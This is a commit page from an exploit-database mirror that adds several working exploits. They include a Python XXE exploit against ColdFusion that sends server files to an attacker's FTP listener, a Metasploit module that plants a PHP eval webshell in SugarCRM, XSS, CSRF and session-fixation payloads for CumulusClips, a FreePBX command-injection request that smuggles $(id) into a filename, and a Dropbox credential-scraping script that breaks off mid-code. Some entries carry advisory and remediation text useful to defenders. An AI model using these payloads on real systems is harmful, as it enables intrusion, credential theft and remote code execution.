bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-08

Browse source 
6 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2016-09-08 05:08:29 +00:00
parent d36011b4f9
commit 2aa9d941de
8 changed files with 3077 additions and 1814 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3618
files.csv
View file

File diff suppressed because it is too large Load diff

2
platforms/linux/remote/15449.pl
View file

@ -1,6 +1,8 @@
# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope
#
# E-DB Note: If you have issues with this exploit, alter lines 549, 555 and 563.
use IO::Socket;

572
platforms/multiple/webapps/40346.py Executable file
View file

@ -0,0 +1,572 @@
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-4264
- APSB16-30
- Release date: 31.08.2016
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
Adobe ColdFusion <= 11 XML External Entity (XXE) Injection
II. BACKGROUND
-------------------------
"Adobe ColdFusion 11 Enterprise Edition offers a single platform to
rapidly build and deploy scalable, high-performing web and mobile
applications. Leverage unique capabilities to develop, test, and debug
mobile applications end to end. Generate high-quality PDF files and
manipulate them easily."
http://www.adobe.com/products/coldfusion-family.html
ColdFusion is widely deployed. A google search for a ColdFusion index file
(index.cfm) exposes over 30 million websites of various sectors that make use
of ColdFusion platform in a visible way:
https://www.google.com/?q=inurl:%2Findex.cfm
including various government websites:
https://www.google.com/search?q=inurl:index.cfm+site:gov
III. INTRODUCTION
-------------------------
An independent research revealed that Adobe ColdFusion in versions 11 and below
is vulnerable to XXE Injection when processing untrusted office documents.
Depending on web application's functionality and the attacker's ability to
supply a malicious document to be processed by a vulnerable ColdFusion
application, this vulnerability may potentially be exploited by both
low-privileged and unauthenticated remote attackers.
This vulnerability can allow various attacks including:
- reading arbitrary files (stored on the server and within the network shares)
- listing web/system directories
- SSRF attacks / unauthorized access to restricted services running on the localhost
as well as within the victim's server network
- SMB relay attacks
- temporary file uploads which may be used by attackers in combination with LFI
vulnerabilities to supply malicious code
This advisory provides a PoC exploit that demonstrates how a remote attacker
could read arbitrary files from the target server, as well as list directories.
Ability to read arbitrary files could for example let attackers extract sensitive
information such as ColdFusion password hashes of the management console or stored
database credentials.
This could allow unauthorized access to weakly protected ColdFusion management
interfaces and let attackers upload malicious code which could be used to fully
compromise the server.
IV. DESCRIPTION
-------------------------
The XXE vulnerability was found in the Office Open XML (OOXML) processing
functions which are utilised when opening documents that use XML structure.
Documents that are commonly stored in this format include:
- DOCX (Word documents)
- XLSX (Excel spreadsheets)
- PPTX (PowerPoint presentations)
More information about the format can be found in:
https://en.wikipedia.org/wiki/Office_Open_XML
The vulnerability is caused by an unrestricted XML parser which allows
for external XML entities processing when parsing such document.
Many web applications often accept OOXML documents from their users to process
documents of various purposes, for example:
- invoices
- bank statements
- bills
- tax forms
- inventory
- CVs / cover letters
- application forms
etc.
Such upload functionality is often exposed to low-privileged or even
unauthenticated remote users.
If an attacker is able to upload a specially crafted OOXML document
which is later processed by an application written in Adobe ColdFusion,
they may be able to perform various malicious actions including
arbitrary file reading and directory listing as mentioned in the
introduction.
This could for example be used by malicious users to read sensitive
ColdFusion config files such as:
- neo-security.xml , which stores ColdFusion admin's password hash salt
- password.properties , which stores admin's password hash
- neo-datasource.xml , which stores database credentials
that are stored in c:\ColdFusion11\cfusion\lib\ directory by default on Windows
installations.
Attackers might also access the application sourcecodes within the documentroot:
c:\ColdFusion11\cfusion\wwwroot
or access other sensitive system files available within the system.
As the vulnerability also allows browsing the filesystem and its directories,
attackers may easily find interesting files and ColdFusion config/webroot
directories even if the paths differ from the default ones.
Attackers who have gained access to password hashes could then proceed
to cracking them in order to gain unauthorised access to the databases and
ColdFusion administrator panels to fully compromise the target.
More information on hashes used by ColdFusion 11 can be found in the references
below.
The next section presents a PoC exploit that can be used for file/directory
retrieval.
The exploit will work even if the target ColdFusion application does not return
any data back to the attacker upon processing a malicious document file.
The extracted data will be sent over the network back to the attacker as soon
as the document file is processed.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
An example vulnerable ColdFusion application written in CFML language
which loads a spreadsheet document could look as follows:
---[ vulnerable.cfm ]---
<cfspreadsheet format="csv" action="read" src="#expandPath( 'cf_poc_exploit.xlsx' )#" name="xlsdoc" rows="1-4" />
<cfoutput>#xlsdoc#</cfoutput>
------------------------
For simplicity, this ColdFusion application will load cf_poc_exploit.xlsx
document from the current directory.
In a real-world situation the application would allow a user to upload a
document from their disk or alternatively fetch it from a URL.
Attacker could use the exploit below to prepare a malicious document and
supply it to a vulnerable ColdFusion application.
---[ ./cf_xxe_exploit.py ]---
'''
#!/usr/bin/python
intro = """
(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit
This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be
uploaded to a vulnerable ColdFusion application.
It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080)
in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
"""
usage = """
Usage:
The exploit requires that you have an external IP and can start web/http listeners on ports
8080/9090 on the attacking machine.
./cf_xxe_exploit.py external_IP 'path_to_fetch'
The example below starts an ftp listener on 192.168.1.40 (port 9090) and web server on 8080
and fetches c:\windows\win.ini file from the target.
./cf_xxe_exploit.py 192.168.1.40 c:/windows/win.ini
The path can also be a directory to retrieve a directory listing e.g:
./cf_xxe_exploit.py 192.168.1.40 c:/
will list the contents of drive C: on Windows
Disclaimer:
For testing purposes only. Do no harm.
Full advisory URL:
http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
"""
import socket
import subprocess
import sys
import web # http://webpy.org/installation
import threading
import time
# What file to retrieve from the victim server
target_file = "c:/ColdFusion11/cfusion/lib/pass"
# Web server (to serve XML)
external_ip = '192.168.57.10'
web_port = 8080
# File receiver
ftp_port = 9090
timeout=5
# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection
class webserver(threading.Thread):
def run (self):
urls = ('/passdata.xml', 'pass_xml')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port))
# Pass data to ftp server using passdata.xml
class pass_xml:
def GET(self):
print xxe_send_payload
# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection
class webserver(threading.Thread):
def run (self):
urls = ('/passdata.xml', 'pass_xml')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port))
# Return helper xml/xxe payload to forward data
class pass_xml:
def GET(self):
print "[+] Received GET /passdata.xml web request from the victim (%s) ! TARGET VULNERABLE to XXE !\n" % (web.ctx['ip'])
return xxe_send_payload
def shutdown(code):
print "[+] That's it folks :) Shutting down \n"
web.httpserver.server.interrupt = KeyboardInterrupt()
exit(code)
# [ Main Meat ]
print intro
redirector_started = 0
if len(sys.argv) < 3 :
print usage
sys.exit(2)
# Overwrite settings with parameters from argv[]
external_ip = sys.argv[1]
target_file = sys.argv[2]
print "[+] Setting external IP to '%s' and target path to '%s'\n" % (external_ip, target_file)
# Prepare XXE payloads
#OOXML XXE stub
ooxml_xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Types [
<!ENTITY % remote SYSTEM "http://_attackerhost_:_webport_/passdata.xml">
%remote;
]>
"""
ooxml_xxe_payload = ooxml_xxe_payload.replace("_attackerhost_", external_ip)
ooxml_xxe_payload = ooxml_xxe_payload.replace("_webport_", str(web_port))
# passdata.xml
xxe_send_payload = """<!ENTITY % file1 SYSTEM "file:///_filepath_">
<!ENTITY % param1 '<!ENTITY &#37; retrfile1 SYSTEM "ftp://cfhack:PoCexploit@_attackerhost_:_ftpport_/%file1;" >' >
%param1;
%retrfile1; """
xxe_send_payload = xxe_send_payload.replace("_filepath_", target_file)
xxe_send_payload = xxe_send_payload.replace("_attackerhost_", external_ip)
xxe_send_payload = xxe_send_payload.replace("_ftpport_", str(ftp_port))
# Create OXML spreadsheet file cf_poc_spreadsheet.xlsx with XXE payload
f = open("[Content_Types].xml", "w")
f.write(ooxml_xxe_payload )
f.close()
cmd = "zip -r cf_poc_spreadsheet.xlsx '[Content_Types].xml' && rm -f '[Content_Types].xml'"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait()
if rc != 0:
print "Error: failed to execute command:", cmd
print error
shutdown(3)
print "[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file\n"
print "[+] Starting our web server to serve XML on %s:%s \n" % (external_ip, web_port)
webserver().start()
time.sleep(1)
print '\n[+] Starting FTP/data listener and waiting for connection on %s:%d\n' % (external_ip, ftp_port)
s = socket.socket() # Create/bind socket
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((external_ip, ftp_port))
print "[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...\n"
s.listen(5) # Wait for the victim to connect
c, addr = s.accept() # Establish connection with the victim
print '\n[+] Got a connection from ', addr, " to our FTP/data server. Meaning juicy data is on the way! :)\n"
c.send("220 Welcome to ColdFusion XXE PoC exploit server\n")
print '[+] Receiving data from the victim...\n'
downloaded = ""
while True:
data = ""
c.settimeout(timeout)
try:
data = c.recv(1024)
except socket.timeout:
print "Timeout ! No more data\n"
break
# extract data
if data.startswith("CWD "):
downloaded = downloaded + data[4:]
if data.startswith("RETR "):
downloaded = downloaded + data[5:]
print "Received packet: " + data
#sys.stdout.write('.')
#sys.stdout.flush()
if "USER" in data:
c.send("331 password needed\n")
elif "RETR" in data:
c.send("550 No such file or directory.\n")
break
else:
c.send('230 continue\n')
# Results
print "\n\n[+] Here's the retrieved contents of the target file/directory (%s) : \n\n%s\n" % (target_file, downloaded)
# shutdown
c.close() # Close the connection
s.shutdown(0)
s.close()
shutdown(0)
'''
-------------[eof]-----------
You can see the exploit in action in a PoC video at:
http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit
There are also two examples below:
A) Reading c:/ColdFusion11/cfusion/lib/neo-security.xml file which contains admin hash salt:
root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/cfusion/lib/neo-security.xml
(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit
This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be
uploaded to a vulnerable ColdFusion application.
It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080)
in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/cfusion/lib/neo-security.xml'
[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file
[+] Starting our web server to serve XML on 192.168.57.10:8080
http://0.0.0.0:8080/
[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090
[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...
[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !
192.168.57.21:57219 - - [31/Aug/2016 20:12:06] "HTTP/1.1 GET /passdata.xml" - 200 OK
[+] Got a connection from ('192.168.57.21', 57220) to our FTP/data server. Meaning juicy data is on the way! :)
[+] Receiving data from the victim...
Received packet: USER cfhack
Received packet: PASS PoCexploit
Received packet: TYPE I
Received packet: CWD <wddxPacket version='1.0'><header
[cut]
[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/cfusion/lib/neo-security.xml) :
<wddxPacket version='1.0'><header
[cut]
struct><
var><var name='admin.userid.root.salt'><string>A54B28011C6AC37F4D65B7D608D40722DAD6CDF25A943C809492637D2CC6265F<
string><
var><var name='rds.enabled'><string>false<
[cut]
[+] That's it folks :) Shutting down
~~~~~~~~~~~~
B) Listing the contents of the c:/ColdFusion11/ directory:
root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/
[cut]
[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/'
[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file
[+] Starting our web server to serve XML on 192.168.57.10:8080
http://0.0.0.0:8080/
[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090
[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...
[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !
192.168.57.21:57245 - - [31/Aug/2016 20:14:06] "HTTP/1.1 GET /passdata.xml" - 200 OK
[+] Got a connection from ('192.168.57.21', 57246) to our FTP/data server. Meaning juicy data is on the way! :)
[+] Receiving data from the victim...
Received packet: USER cfhack
Received packet: RETR Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log
cf_app.ico
[cut]
[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/) :
Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log
cf_app.ico
cfusion
config
jre
license.html
Readme.htm
uninstall
[+] That's it folks :) Shutting down
VI. BUSINESS IMPACT
-------------------------
The vulnerability can be abused by low-privileged or unauthenticated remote
attackers depending on application's functionality and lead to sensitive
information disclosure. It can allow attackers to read arbitrary files or
expose internal services running on the server and within the local network.
Attackers could for example read stored password hashes or database credentials
which may aid attackers with gaining access to ColdFusion admin interface.
Extracting application sourcecodes could also be of use to attackers and help
them to find other vulnerabilities to fully compromise an affected target.
VII. SYSTEMS AFFECTED
-------------------------
ColdFusion installations before:
- ColdFusion 11 Update 10
- ColdFusion 10 Update 21
are affected by this vulnerability.
VIII. SOLUTION
-------------------------
Update to ColdFusion 11 Update 10 which include critical hotfixes released by
the vendor upon initial private disclosure to Adobe. Alternatively users can
upgrade their installation to ColdFusion 2016 which is not affected.
The vulnerability fix/advisory has been assigned APSB16-30 id by Adobe.
Links to the critical Adobe hotfix patches can be found in the references below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
http://legalhackers.com/exploits/cf_xxe_exploit_CVE-2016-4264.py
PoC exploit video:
http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4264
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4264
Adobe ColdFusion critical hotfix/vuln announcement:
https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html
Info on ColdFusion configs and used hashes:
http://www.openwall.com/lists/john-users/2015/06/07/1
https://helpx.adobe.com/coldfusion/kb/purpose-location-xml-configuration-files.html
https://blogs.adobe.com/psirt/?p=1395
http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
Lockdown guides:
http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf11/cf11-lockdown-guide.pdf
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
31.08.2016 - advisory released
01.09.2016 - corrections applied
07.09.2016 - added PoC video
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''

89
platforms/php/remote/40344.rb Executable file
View file

@ -0,0 +1,89 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SugarCRM REST Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
which could be abused to allow unauthenticated users to execute arbitrary PHP code with
the permissions of the webserver. The dangerous unserialize() call exists in the
'/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
},
'Author' => 'EgiX',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://karmainsecurity.com/KIS-2016-07'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
['URL', 'https://bugs.php.net/bug.php?id=72663']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 23 2016'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
], self.class)
end
def exploit
upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
payload_serialized = "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),
'method' => 'POST',
'vars_post' => {
'method' => 'login',
'input_type' => 'Serialize',
'rest_data' => payload_serialized
}
})
if not res or res.code != 200
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
register_files_for_cleanup(File.basename(upload_php))
print_status("#{peer} - Executing the payload #{upload_php}")
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, upload_php),
'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
})
if res and res.code != 200
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end
end
end

156
platforms/php/webapps/40343.txt Executable file
View file

@ -0,0 +1,156 @@
# Exploit Title: CumulusClips Session fixation
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
Description:
CumulusClips is a video sharing script that allows you to start your own
video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS &
Android mobile devices, as well as all the major browsers.
PoC:
POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/
Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID%
3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C%
2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url=
BOZtzZX&submitted=TRUE&button=Update+Video
Remediation:
Change session id after sucessful login
Post exploitation:
Since it is posible to impersonate admin there is possibility for a code
execution and unrestricted file upload in admin panel.
#######################################################
# Exploit Title: CumulusClips XSRF and code execution
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
PoC:
<html>
<body>
<form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="email" value="admin&#64;mailinator&#46;com" />
<input type="hidden" name="username" value="newadmin" />
<input type="hidden" name="password" value="newadminpass" />
<input type="hidden" name="password&#45;show" value="" />
<input type="hidden" name="first&#95;name" value="" />
<input type="hidden" name="last&#95;name" value="" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="about&#95;me" value="" />
<input type="hidden" name="submitted" value="TRUE" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Remediation:
Use anti-csrf token, fix all XSS'es
#######################################################
# Exploit Title: CumulusClips Persistent XSS
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information.
PoC:
locations:
/cumulusclips/account/videos/edit/
/cumulusclips/account/upload/video/
POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/
Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video
reflected on main site:
GET /cumulusclips/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/
Connection: close
RESPONSE:
...
div class="video">
<div class="thumbnail">
<a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>">
<img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" />
...
Post exploitation:
Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel.
Remediation:
Validate user input for special characters (preferable white list), use HTTPonly header

122
platforms/php/webapps/40345.txt Executable file
View file

@ -0,0 +1,122 @@
Vulnerable software : Freepbx
Tested versions : 13.0.x < 13.0.154
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com
Knock knock people , Eg-R1z on the mic again . .
Freepbx is vulnerable to unauthenticated remote command execution due to multiple weak inputs validation as well as partial authenticaion bypass
Need more technical shit?!
Here u go
File : /var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php
class Process
{
const ERR = 'err';
const OUT = 'out';
const STATUS_READY = 'ready';
const STATUS_STARTED = 'started';
const STATUS_TERMINATED = 'terminated';
Line 145:
public function __construct($commandline, $cwd = null, array $env = null, $input = null, $timeout = 60, array $options = array())
{
if (!function_exists('proc_open')) {
throw new RuntimeException('The Process class relies on proc_open, which is not available on your PHP installation.');
}
--===>>> $this->commandline = $commandline;
$this->cwd = $cwd;
Line 275
$commandline = $this->commandline;
if ('\\' === DIRECTORY_SEPARATOR && $this->enhanceWindowsCompatibility) {
$commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')';
foreach ($this->processPipes->getFiles() as $offset => $filename) {
$commandline .= ' '.$offset.'>'.ProcessUtils::escapeArgument($filename);
}
$commandline .= '"';
if (!isset($this->options['bypass_shell'])) {
$this->options['bypass_shell'] = true;
}
}
--===>>> $this->process = proc_open($commandline, $descriptors, $this->processPipes->pipes, $this->cwd, $this->env, $this->options);
Class is being called at
File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php
Line 118
public function convert($newFilename,$extension,$mime) {
switch($extension) {
case "wav":
switch($this->extension) {
case "sln":
$process = new Process($this->binary.' -t raw -s -b 16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b '.$this->options['bitdepth'].' -c 1 '.$newFilename);
break;
case "sln12":
$process = new Proces.................
case "wav16":
---===>> $process = new Process($this->binary.' '.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename);
break;
default:
$process = new Process($this->binary.' '.$this->track.' -c 1 '.$newFilename);
break;
}
if(!$this->background) {
---===>> $process->run();
if (!$process->isSuccessful()) {
throw new \RuntimeException($process->getErrorOutput());
}
} else {
$process->start();
if (!$process->isRunning()) {
throw new \RuntimeException($process->getErrorOutput());
}
}
}
Sox shell can be called via multiple parts of the fpbx including the music module
File : admin/modules/music/Music.class.php
Line : 407
$name = $dname . '.' . $extension;
move_uploaded_file($tmp_name, $this->tmp."/".$name);
$media->load($this->tmp."/".$name);
foreach($_POST['codec'] as $c) {
--==>> $media->convert($path."/".$dname.".".$c);
}
unlink($this->tmp."/".$name);
this part can be accessed by unauthenticated user and so it's obvious command execution vulnerable :/
POC :
[root:/lab/fpbx]# curl -i -s -k -X 'POST' \
-H 'User-Agent: sec4ever 1337s' -H 'Referer: http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------317092200613369' \
--data-binary $'-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you ;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \
'http://x.x.x.x/admin/ajax.php?module=music&command=upload'
HTTP/1.1 500 Internal Server Error
Date: Wed, 07 Sep 2016 17:33:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.28
Set-Cookie: lang=en_US
Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Ignore-This: 1
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats: can't open input file `groups=498(asterisk).wav': No such file or directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}#
Patching : can be done via adding escapeshellarg to soxshell inputs
Almost fixed in fpbx later versions
# in this version spaces,',`,/,\,<,>,?,&,| are filtered , which can be super easily bypassed
# make a priv8 , burn another ;)
# From Eg-R1z with Love xD

242
platforms/windows/local/40341.txt Executable file
View file

@ -0,0 +1,242 @@
#####
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.dropbox.com
# Date 06/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "Dropbox.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
memory_dump.append(process.read(address,100))
for i in range(len(memory_dump)):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('\x00')[0]
